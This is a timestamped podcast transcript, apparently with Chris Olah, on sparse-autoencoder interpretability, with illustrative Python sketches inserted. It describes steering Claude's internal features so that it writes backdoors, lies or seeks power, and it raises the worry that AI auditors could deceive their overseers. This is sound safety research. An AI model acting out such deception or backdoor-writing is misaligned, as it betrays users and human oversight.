04:51:02.940 | there. I mean, one certainly could do that, right? One could assume that there's a PHP feature and go
04:51:08.540 | and search for it. But we're not doing that. We're saying we don't know what's going to be there.
04:51:11.900 | Instead, we're just going to go and let the sparse autoencoder discover the things that are there.
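A minimal sparse autoencoder sketch in the spirit of what is described here: reconstruct activations through a much wider hidden layer with an L1 sparsity penalty. The sizes, penalty coefficient, and single training step are illustrative assumptions, not Anthropic's actual setup:

```python
import torch
import torch.nn as nn

d_model, d_dict = 512, 8192   # activation width -> much larger dictionary of features

class SparseAutoencoder(nn.Module):
    def __init__(self):
        super().__init__()
        self.encoder = nn.Linear(d_model, d_dict)
        self.decoder = nn.Linear(d_dict, d_model)

    def forward(self, x):
        feats = torch.relu(self.encoder(x))      # non-negative feature activations
        return self.decoder(feats), feats

sae = SparseAutoencoder()
opt = torch.optim.Adam(sae.parameters(), lr=1e-4)
l1_coeff = 1e-3                                  # sparsity penalty strength (assumed)

acts = torch.randn(64, d_model)                  # stand-in for a batch of model activations
recon, feats = sae(acts)
loss = ((recon - acts) ** 2).mean() + l1_coeff * feats.abs().mean()
opt.zero_grad()
loss.backward()
opt.step()
print(f"reconstruction + sparsity loss on this batch: {loss.item():.3f}")
```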
04:51:15.900 | >> So, can you talk to the Towards Monosemanticity paper from October last year? They had a lot of
04:51:22.460 | like nice breakthrough results. >> That's very kind of you to describe it that way. Yeah, I mean,
04:51:26.380 | this was our first real success using sparse autoencoders. So, we took a one-layer model.
04:51:33.820 | And it turns out, if you go and you do dictionary learning on it, you find all these really nice
04:51:39.660 | interpretable features. So, the Arabic feature, the Hebrew feature, the base64 feature. Those
04:51:44.860 | were some examples that we studied in a lot of depth and really showed that they were
04:51:49.340 | what we thought they were. It turns out, as well, that if you train a model twice, train two different
04:51:52.540 | models, and do dictionary learning, you find analogous features in both of them. So, that's fun.
04:51:56.380 | You find all kinds of different features. So, that was really just showing that this works. And I
04:52:03.660 | should mention that there was this Cunningham et al. paper that had very similar results around the same
04:52:08.140 | time. >> There's something fun about doing these kinds of small-scale experiments and finding that
04:52:13.340 | it's actually working. >> Yeah, well, and there's so much structure here. So, maybe
04:52:19.100 | stepping back for a while, I thought that maybe all this mechanistic interpretability work,
04:52:25.020 | the end result was going to be that I would have an explanation for why it was very hard and not
04:52:30.540 | going to be tractable. We'd be like, "Well, there's this problem with superposition. And it
04:52:34.300 | turns out superposition is really hard, and we're kind of screwed." But that's not what happened.
04:52:38.700 | In fact, a very natural, simple technique just works. And so, then that's actually a very good
04:52:43.820 | situation. I think this is a sort of hard research problem, and it's got a lot of research risk. And
04:52:49.500 | you know, it might still very well fail. But I think that some very significant amount of research
04:52:54.540 | risk was sort of put behind us when that started to work. >> Can you describe what kind of features
04:53:00.460 | can be extracted in this way? >> Well, so, it depends on the model that you're studying, right?
04:53:05.020 | So, the larger the model, the more sophisticated they're going to be. And we'll probably talk about
04:53:08.860 | follow-up work in a minute. But in these one-layer models, so, some very common things, I think,
04:53:13.820 | were languages, both programming languages and natural languages. There were a lot of features
04:53:18.860 | that were specific words in specific contexts. So, "the," and I think really the way to think
04:53:24.060 | about this is that "the" is likely about to be followed by a noun. So, it's really, you could
04:53:28.460 | think of this as "the" feature, but you could also think of this as producing a specific noun feature.
04:53:31.980 | And there would be these features that would fire for "the" in the context of, say, a legal document
04:53:38.220 | or a mathematical document or something like this. And so, maybe in the context of math,
04:53:45.660 | you're like, "the" and then predict vector or matrix, all these mathematical words,
04:53:50.220 | whereas in other contexts, you would predict other things. That was common.
04:53:53.740 | >> And basically, we need clever humans to assign labels to what we're seeing.
04:53:59.820 | >> Yes. So, the only thing this is doing is it's sort of unfolding things for you. So,
04:54:05.900 | if everything was sort of folded over top of it, you know, superposition folded everything on top
04:54:09.660 | of itself, and you can't really see it, this is unfolding it. But now you still have a very
04:54:14.140 | complex thing to try to understand. So, then you have to do a bunch of work understanding what
04:54:18.060 | these are. And some of them are really subtle. Like, there's some really cool things, even in
04:54:22.860 | this one-layer model about Unicode, where, you know, of course, some languages are in Unicode,
04:54:27.580 | and the tokenizer won't necessarily have a dedicated token for every Unicode character.
04:54:33.580 | So, instead, what you'll have is you'll have these patterns of alternating tokens that each
04:54:38.460 | represent half of a Unicode character. And you have a different feature that, you know, goes and
04:54:42.620 | activates on the opposing ones to be like, okay, you know, I just finished a character, you know,
04:54:46.940 | go and predict next prefix. Then, okay, I'm on the prefix, you know, predict a reasonable suffix,
04:54:52.540 | and you have to alternate back and forth. So, there's, you know, these one-layer models are
04:54:57.180 | really interesting. And I mean, there's another thing, which is, you might think, okay, there
04:55:01.020 | would just be one Base64 feature. But it turns out, there's actually a bunch of Base64 features,
04:55:05.420 | because you can have English text encoded as Base64, and that has a very different distribution
04:55:11.180 | of Base64 tokens than regular. And there's some things about tokenization as well that
04:55:17.900 | it can exploit, and I don't know, there's all kinds of fun stuff.
04:55:21.100 | How difficult is the task of sort of assigning labels
04:55:24.380 | to what's going on? Can this be automated by AI?
04:55:28.220 | Well, I think it depends on the feature. And it also depends on how much you trust your AI.
04:55:31.980 | So, there's a lot of work doing automated interpretability. I think that's a really
04:55:37.340 | exciting direction. And we do a fair amount of automated interpretability and have
04:55:41.100 | Claude go and label our features.
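A hedged sketch of what that labeling loop can look like: show a model the top activating snippets for a feature and ask for a short description. The call_llm helper is a hypothetical stand-in for whatever model API is used:

```python
def label_feature(top_examples, call_llm):
    # call_llm is a hypothetical helper: takes a prompt string, returns model text.
    prompt = (
        "Here are text snippets that most strongly activate one feature of a neural network:\n\n"
        + "\n".join(f"- {ex}" for ex in top_examples)
        + "\n\nIn a few words, what concept does this feature seem to represent?"
    )
    return call_llm(prompt)

# Hypothetical usage:
# label_feature(["--disable-ssl-verification", "verify=False  # skip cert check"], call_llm)
```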
04:55:42.780 | Is there some funny moments where it's totally right or it's totally wrong?
04:55:47.260 | Yeah, well, I think it's very common that it's like, says something very general,
04:55:52.780 | which is like, true in some sense, but not really picking up on the specific of what's going on.
04:55:58.220 | So, I think that's a pretty common situation.
04:56:02.780 | I don't know that I have a particularly amusing one.
04:56:06.220 | That's interesting, that little gap between it is true,
04:56:08.780 | but it doesn't quite get to the deep nuance of a thing. That's a general challenge. It's like,
04:56:16.860 | it's already incredible that it can say a true thing, but it's missing
04:56:22.780 | the depth sometimes. And in this context, it's like the ARC challenge, the sort of IQ type of tests.
04:56:29.020 | It feels like figuring out what a feature represents is a little puzzle you have to solve.
04:56:35.660 | Yeah. And I think that sometimes they're easier and sometimes they're harder as well.
04:56:38.620 | So, yeah, I think that's tricky. And there's another thing, which I don't know, maybe in
04:56:45.420 | some ways, this is my aesthetic coming in, but I'll try to give you a rationalization.
04:56:49.660 | I'm actually a little suspicious of automated interpretability. And I think that's partly just
04:56:53.340 | that I want humans to understand neural networks. And if the neural network is understanding it for
04:56:57.500 | me, I don't quite like that. But I do have a bit of, in some ways, I'm sort of like the
04:57:02.220 | mathematicians who are like, if there's a computer-automated proof, it doesn't count,
04:57:05.020 | because they won't understand it. But I do also think that there's this kind of reflections on trusting
04:57:11.580 | trust type issue, where there's this famous talk about when you're writing a computer program,
04:57:19.340 | you have to trust your compiler. And if there was like malware in your compiler,
04:57:22.620 | then it could go and inject malware into the next compiler and you'd be kind of in trouble, right?
04:57:27.100 | Well, if you're using neural networks to go and verify that your neural networks are safe,
04:57:32.700 | the hypothesis that you're testing for is like, okay, well, the neural network maybe isn't safe.
04:57:36.140 | And you have to worry about like, is there some way that it could be screwing with you?
04:57:40.700 | So, I think that's not a big concern now. But I do wonder in the long run, if we have to use
04:57:46.380 | really powerful AI systems to go and audit our AI systems, is that actually something we can trust?
04:57:53.100 | But maybe I'm just rationalizing because I just want us to have to get to a point where humans
04:57:57.100 | understand everything. Yeah. I mean, especially, that's hilarious, especially as we talk about AI
04:58:01.820 | safety and looking for features that would be relevant to AI safety, like deception and so on.
04:58:07.740 | So, let's talk about the Scaling Monosemanticity paper from May 2024. Okay. So, what did it take to
04:58:14.380 | scale this, to apply it to Claude 3? Well, a lot of GPUs. A lot more GPUs. But one of my teammates,
04:58:22.380 | Tom Henighan, was involved in the original scaling laws work. And something that he was sort of
04:58:29.660 | interested in from very early on is, are there scaling laws for interpretability?
04:58:36.060 | And so, something he sort of immediately did when this work started to succeed, and we started to
04:58:42.060 | have sparse autoencoders work, was he became very interested in, what are the scaling laws
04:58:46.060 | for making sparse autoencoders larger? And how does that relate to making the base model larger?
04:58:54.140 | And so, it turns out this works really well. And you can use it to sort of project,
04:58:58.780 | if you train a sparse autoencoder at a given size, how many tokens should you train on? And so on.
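For intuition, a fit of that flavor is just a power law fitted on log-log data. The numbers below are invented purely for illustration, not results from the paper:

```python
import numpy as np

sizes  = np.array([2**12, 2**14, 2**16, 2**18])   # dictionary sizes (invented)
losses = np.array([0.30, 0.21, 0.15, 0.105])      # reconstruction losses (invented)

# Fit log(loss) = b * log(size) + log(a), i.e. loss ~= a * size**b.
b, log_a = np.polyfit(np.log(sizes), np.log(losses), 1)
pred = np.exp(log_a) * (2**20) ** b
print(f"fitted exponent b ~= {b:.2f}; extrapolated loss at 2**20 features: {pred:.3f}")
```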
04:59:04.220 | So, this was actually a very big help to us in scaling up this work, and made it a lot easier
04:59:09.500 | for us to go and train really large sparse autoencoders, where it's not like training
04:59:15.180 | the big models, but it's starting to get to a point where it's actually expensive to go
04:59:18.700 | and train the really big ones. So, you have to do all this stuff of splitting it across
04:59:24.540 | large GPUs. Oh, yeah. I mean, there's a huge engineering challenge here too, right? So,
04:59:28.620 | yeah. So, there's a scientific question of how do you scale things effectively? And then there's
04:59:33.420 | an enormous amount of engineering to go and scale this up. So, you have to shard it, you have to
04:59:37.980 | think very carefully about a lot of things. And I'm lucky to work with a bunch of great engineers,
04:59:41.580 | because I am definitely not a great engineer. Yeah. And the infrastructure, especially. Yeah,
04:59:44.700 | for sure. So, it turns out, TL;DR, it worked. It worked. Yeah. And I think this is important,
04:59:50.780 | because you could have imagined a world where you said, after Towards Monosemanticity,
04:59:55.420 | You know, Chris, this is great. It works on a one-layer model. But one-layer models are
04:59:59.740 | really idiosyncratic. Maybe the linear representation hypothesis and superposition
05:00:05.660 | hypothesis is the right way to understand a one-layer model, but it's not the right way
05:00:09.020 | to understand larger models. And so, I think, I mean, first of all, the Cunningham et al paper
05:00:14.860 | cut through that a little bit and suggested that this wasn't the case. But Scaling Monosemanticity,
05:00:21.020 | I think, was significant evidence that even for very large models, and we did it on Claude 3
05:00:25.340 | Sonnet, which at that point was one of our production models, you know, even these models
05:00:30.860 | seem to be very, you know, seem to be substantially explained, at least, by linear features, and,
05:00:37.740 | you know, doing dictionary learning on them works. And as you learn more features, you go and you
05:00:40.700 | explain more and more. So, that's, I think, quite a promising sign. And you find now really
05:00:47.260 | fascinating abstract features. And the features are also multimodal. They respond to images and
05:00:52.860 | text for the same concept, which is fun. - Yeah. Can you explain that? I mean, like,
05:00:57.340 | you know, backdoor, there's just a lot of examples that you can...
05:01:00.700 | - Yeah. So, maybe let's start with one example to start, which is we found some features around,
05:01:05.420 | sort of, security vulnerabilities and backdoors in code. So, it turns out those are actually two
05:01:08.860 | different features. So, there's a security vulnerability feature. And if you force it
05:01:13.260 | active, Claude will start to go and write security vulnerabilities like buffer overflows into code.
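Forcing a feature active is often done by adding its decoder direction to the model's activations at some layer. Here is a hedged sketch with a hypothetical open-weights transformer and feature direction, not Claude's internals:

```python
import torch

def make_steering_hook(direction: torch.Tensor, scale: float = 10.0):
    # Adds a fixed multiple of a feature's (unit-norm) decoder direction to the
    # layer's output. Assumes the hooked module returns a (batch, seq, d_model) tensor.
    direction = direction / direction.norm()
    def hook(module, inputs, output):
        return output + scale * direction
    return hook

# Hypothetical usage with some transformer `model` and a sparse autoencoder `sae`
# trained on one of its layers:
# feature_dir = sae.decoder.weight[:, feature_index]   # one decoder column = one feature direction
# handle = model.layers[20].register_forward_hook(make_steering_hook(feature_dir))
# ... run generation with the feature forced active, then: handle.remove()
```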
05:01:19.100 | And also, it fires for all kinds of things. Like, you know, some of the top dataset examples for it
05:01:23.500 | were things like, you know, dash, dash, disable, you know, SSL or something like this, which are
05:01:29.420 | sort of obviously really insecure. - So, at this point, it's kind of like,
05:01:35.900 | maybe it's just because the examples are presented that way, it's kind of like surfacing a little bit
05:01:40.300 | more obvious examples, right? I guess the idea is that down the line, it might be able to detect
05:01:47.180 | more nuanced, like deception or bugs or that kind of stuff.
05:01:50.460 | - Yeah. Well, maybe I want to distinguish two things. So, one is the complexity of the feature
05:01:56.780 | or the concept, right? And the other is the nuance of how subtle the examples we're looking at,
05:02:04.620 | right? So, when we show the top dataset examples, those are the most extreme examples that cause
05:02:09.820 | that feature to activate. And so, it doesn't mean that it doesn't fire for more subtle things.
05:02:15.180 | So, the insecure code feature, you know, the stuff that it fires for most strongly for are these,
05:02:21.420 | like, really obvious, you know, disable the security type things. But, you know, it also
05:02:29.420 | fires for, you know, buffer overflows and more subtle security vulnerabilities in code. You know,
05:02:35.660 | these features are all multimodal. So, you could ask, like, what images activate this feature?
05:02:39.820 | And it turns out that the security vulnerability feature activates for images of, like, people
05:02:47.740 | clicking on Chrome to, like, go past the, like, you know, this website, the SSL certificate might
05:02:53.900 | be wrong or something like this. Another thing that's very entertaining is there's backdoors
05:02:56.860 | in code feature. Like, you activate it, it goes on, Claude writes a backdoor that, like, will go
05:03:00.060 | and dump your data to some port or something. But you can ask, okay, what images activate the backdoor
05:03:05.260 | feature? It was devices with hidden cameras in them. So, there's a whole, apparently, genre of
05:03:11.260 | people going and selling devices that look innocuous, that have hidden cameras, and they
05:03:14.860 | have ads about how there's a hidden camera in it. And I guess that is the, you know, physical
05:03:19.180 | version of a backdoor. And so, it sort of shows you how abstract these concepts are, right?
05:03:23.660 | And I just thought that was, I'm sort of sad that there's a whole market of people selling devices
05:03:29.900 | like that. But I was kind of delighted that that was the thing that it came up with as the top
05:03:34.460 | image examples for the feature. - Yeah, it's nice. It's multimodal. It's multi-almost context. It's
05:03:39.260 | broad, strong definition of a singular concept. It's nice. - Yeah. - To me, one of the really
05:03:45.740 | interesting features, especially for AI safety, is deception and lying. And the possibility that
05:03:52.700 | these kinds of methods could detect lying in a model, especially gets smarter and smarter and
05:03:57.900 | smarter. Presumably, that's a big threat of a super intelligent model that it can deceive
05:04:04.380 | the people operating it, as to its intentions or any of that kind of stuff. So, what have you
05:04:10.700 | learned from detecting lying inside models? - Yeah. So, I think we're, in some ways, in early
05:04:16.060 | days for that. We find quite a few features related to deception and lying. There's one feature
05:04:23.500 | where it fires for people lying and being deceptive, and you force it active, and Claude starts lying
05:04:28.940 | to you. So, we have a deception feature. I mean, there's all kinds of other features about
05:04:33.580 | withholding information and not answering questions. Features about power-seeking and
05:04:37.580 | coups and stuff like that. There's a lot of features that are kind of related to spooky
05:04:41.980 | things. And if you force them active, Claude will behave in ways that are not the kinds of
05:04:48.460 | behaviors you want. - What are possible next exciting directions to you in the space of
05:04:55.180 | mech interp? - Well, there's a lot of things.
05:04:57.180 | So, for one thing, I would really like to get to a point where we have circuits, where we can
05:05:05.820 | really understand not just the features, but then use that to understand the computation of models.
05:05:12.300 | That really, for me, is the ultimate goal of this. And there's been some work. We put out a few
05:05:19.420 | things. There's a paper from Sam Marks that does some stuff like this. There's been some, I'd say,
05:05:23.580 | some work around the edges here. But I think there's a lot more to do. And I think that will be
05:05:27.740 | a very exciting thing. That's related to a challenge we call interference weights, where
05:05:35.100 | due to superposition, if you just sort of naively look at whether features are connected together,
05:05:40.940 | there may be some weights that sort of don't exist in the upstairs model, but are just sort
05:05:45.180 | of artifacts of superposition. So, that's a sort of technical challenge related to that.
05:05:52.620 | I think another exciting direction is just, you might think of sparse autoencoders as being
05:05:58.940 | kind of like a telescope. They allow us to look out and see all these features that are out there.
05:06:05.980 | And as we build better and better sparse autoencoders, get better and better at dictionary
05:06:10.060 | learning, we see more and more stars. And we zoom in on smaller and smaller stars. But there's kind
05:06:16.460 | of a lot of evidence that we're only still seeing a very small fraction of the stars. There's a lot
05:06:21.740 | of matter in our neural network universe that we can't observe yet. And it may be that we'll never
05:06:29.100 | be able to have fine enough instruments to observe it. And maybe some of it just isn't possible,
05:06:32.780 | isn't computationally tractable to observe. It's sort of a kind of dark matter, not in maybe the
05:06:38.700 | sense of modern astronomy, but of earlier astronomy, when we didn't know what this
05:06:41.740 | unexplained matter is. And so, I think a lot about that dark matter and whether we'll ever
05:06:46.540 | observe it, and what that means for safety if we can't observe it, if some significant fraction of
05:06:52.700 | neural networks are not accessible to us. Another question that I think a lot about is,
05:06:58.700 | at the end of the day, mechanistic interpretability is this very microscopic
05:07:04.300 | approach to interpretability. It's trying to understand things in a very fine-grained way.
05:07:09.100 | But a lot of the questions we care about are very macroscopic. We care about these questions about
05:07:14.940 | neural network behavior. And I think that's the thing that I care most about. But there's lots of
05:07:20.460 | other sort of larger scale questions you might care about. And somehow, the nice thing about
05:07:28.460 | having a very microscopic approach is it's maybe easier to ask, is this true? But the downside is,
05:07:33.180 | it's much further from the things we care about. And so, we now have this ladder to climb. And I
05:07:37.340 | think there's a question of, will we be able to find, are there sort of larger scale abstractions
05:07:42.140 | that we can use to understand neural networks that we get up from this very microscopic approach?
05:07:47.420 | Yeah, you've written about this, this kind of organs question.
05:07:52.300 | Yeah, exactly.
05:07:53.340 | If we think of interpretability as a kind of anatomy of neural networks, most of the
05:07:58.860 | circuits threads involve studying tiny little veins, looking at the small scale, and individual neurons
05:08:04.220 | and how they connect. However, there are many natural questions that the small scale approach
05:08:08.860 | doesn't address. In contrast, the most prominent abstractions in biological anatomy involve larger
05:08:15.340 | scale structures, like individual organs, like the heart, or entire organ systems,
05:08:20.460 | like the respiratory system. And so, we wonder, is there a respiratory system or heart or brain
05:08:27.180 | region of an artificial neural network?
05:08:29.020 | Yeah, exactly. And I mean, like, if you think about science, right, a lot of scientific fields
05:08:33.820 | have, you know, investigate things at many levels of abstractions. In biology, you have like,
05:08:38.780 | you know, molecular biology studying proteins and molecules and so on. And they have cellular
05:08:43.260 | biology, and then you have histology studying tissues, and then you have anatomy, and then you
05:08:47.740 | have zoology, and then you have ecology. And so, you have many, many levels of abstraction. Or,
05:08:52.460 | you know, physics, maybe the physics of individual particles, and then, you know, statistical physics
05:08:56.540 | gives you thermodynamics and things like this. And so, you often have different levels of
05:08:59.980 | abstraction. And I think that right now we have, you know, mechanistic interpretability, if it
05:09:05.820 | succeeds, is sort of like a microbiology of neural networks. But we want something more like anatomy.
05:09:12.060 | And so, and, you know, a question you might ask is, why can't you just go there directly? And I
05:09:16.380 | think the answer is superposition, at least in a significant part. It's that it's actually very hard
05:09:21.100 | to see this macroscopic structure without first sort of breaking down the microscopic structure
05:09:27.900 | in the right way, and then studying how it connects together. But I'm hopeful that there
05:09:32.060 | is going to be something much larger than features and circuits, and that we're going to be able to
05:09:37.420 | have a story that's much, that involves much bigger things. And then you can sort of study
05:09:42.140 | in detail the parts you care about. I suppose, in the biology analogy, like a psychologist or psychiatrist
05:09:47.340 | of a neural network. And I think that the beautiful thing would be if we could go and,
05:09:52.060 | rather than having disparate fields for those two things, if you could have a, build a bridge
05:09:56.140 | between them, such that you could go and have all of your higher level abstractions be grounded very
05:10:03.420 | firmly in this very solid, you know, more rigorous, ideally, foundation. What do you think is the
05:10:11.740 | difference between the human brain, the biological neural network, and the artificial neural network?
05:10:17.580 | Well, the neuroscientists have a much harder job than us. You know, sometimes I just like count
05:10:21.660 | my blessings by how much easier my job is than the neuroscientists, right? So I have, we can record
05:10:26.940 | from all the neurons. We can do that on arbitrary amounts of data. The neurons don't change while
05:10:32.780 | you're doing that, by the way. You can go and ablate neurons, you can edit the connections and
05:10:37.820 | so on. And then you can undo those changes. That's pretty great. You can force any, you can intervene
05:10:43.420 | on any neuron and force it active and see what happens. You know which neurons are connected
05:10:47.660 | to everything, right? Neuroscientists want to get the connectome, we have the connectome.
05:10:50.860 | And we have it for like much bigger than C. elegans. And then not only do we have the connectome,
05:10:55.900 | we know what the, you know, which neurons excite or inhibit each other, right? So we have,
05:11:00.780 | it's not just that we know that like the binary mask, we know the weights. We can take gradients,
05:11:05.660 | we know computationally what each neuron does. So I don't know, the list goes on and on. We just have
05:11:10.620 | so many advantages over neuroscientists. And then just by having all those advantages,
05:11:16.940 | it's really hard. And so one thing I do sometimes think is like, gosh, like,
05:11:21.260 | if it's this hard for us, it seems impossible under the constraints of neuroscience or,
05:11:24.940 | you know, near impossible. I don't know, maybe part of me is like I've got a few neuroscientists
05:11:29.660 | on my team. Maybe I'm sort of like, ah, you know, maybe some of the neuroscientists
05:11:35.020 | would like to have an easier problem that's still very hard. And they could come and work on neural
05:11:40.460 | networks. And then after we figure out things in sort of the easy little pond of trying to
05:11:45.580 | understand neural networks, which is still very hard, then we could go back to biological
05:11:49.740 | neuroscience. - I love what you've written about mech interp research having two goals,
05:11:56.220 | safety and beauty. So can you talk about the beauty side of things? - Yeah. So, you know,
05:12:00.780 | there's this funny thing where I think some people are kind of disappointed by
05:12:06.140 | neural networks, where they're like, ah, you know, neural networks, it's just these simple
05:12:11.260 | rules. And then you just like do a bunch of engineering to scale it up and it works really
05:12:14.300 | well. And like, where are the complex ideas? You know, this isn't a very nice, beautiful
05:12:18.940 | scientific result. And I sometimes think when people say that, I picture them being like, you
05:12:24.460 | know, evolution is so boring. It's just a bunch of simple rules and you run evolution for a long
05:12:29.020 | time and you get biology. Like what a sucky, you know, way for biology to have turned out. Where's
05:12:34.380 | the complex rules? But the beauty is that the simplicity generates complexity. You know,
05:12:41.260 | biology has these simple rules and it gives rise to, you know, all the life and ecosystems that we
05:12:47.100 | see around us, all the beauty of nature. That all just comes from evolution, from something very
05:12:52.140 | simple. And similarly, I think that neural networks create enormous complexity,
05:12:58.940 | beauty, and structure inside themselves that people generally don't look at and don't try
05:13:04.220 | to understand because it's hard to understand. But I think that there is an incredibly rich
05:13:10.220 | structure to be discovered inside neural networks, a lot of very deep beauty, if we're just
05:13:16.700 | willing to take the time to go and see it and understand it. Yeah, I love mech interp. The feeling
05:13:22.860 | like we are understanding or getting glimpses of understanding the magic that's going on inside is
05:13:28.780 | really wonderful. It feels to me like one of the questions that's just calling out to be asked,
05:13:34.940 | and I'm sort of, I mean, a lot of people are thinking about this, but I'm often surprised
05:13:38.780 | that not more are, is how is it that we don't know how to directly create computer
05:13:44.620 | programs that can do these things, and yet we have these neural networks
05:13:50.060 | that can do all these amazing things.
05:13:53.100 | And it just feels like that is obviously the question that sort of is calling out to be
05:13:56.780 | answered. If you have any degree of curiosity, it's like, how is it that humanity
05:14:02.860 | now has these artifacts that can do these things that we don't know how to do?
05:14:06.140 | Yeah. I love the image of the circuits reaching towards the light of the objective function.
05:14:11.020 | Yeah. It's just, it's this organic thing that we've grown and we have no idea what we've grown.
05:14:15.180 | Well, thank you for working on safety and thank you for appreciating the beauty of the things you
05:14:20.140 | discover. And thank you for talking today, Chris. It's wonderful.
05:14:23.660 | Thank you for taking the time to chat as well.
05:14:25.820 | Thanks for listening to this conversation with Chris Olah. And before that,
05:14:28.940 | with Dario Amodei and Amanda Askell. To support this podcast, please check out our sponsors
05:14:34.300 | in the description. And now let me leave you with some words from Alan Watts.
05:14:38.620 | "The only way to make sense out of change is to plunge into it, move with it, and join the dance."
05:14:46.860 | Thank you for listening and hope to see you next time.
05:14:51.180 | [END]
05:14:52.560 | Transcribed by https://otter.ai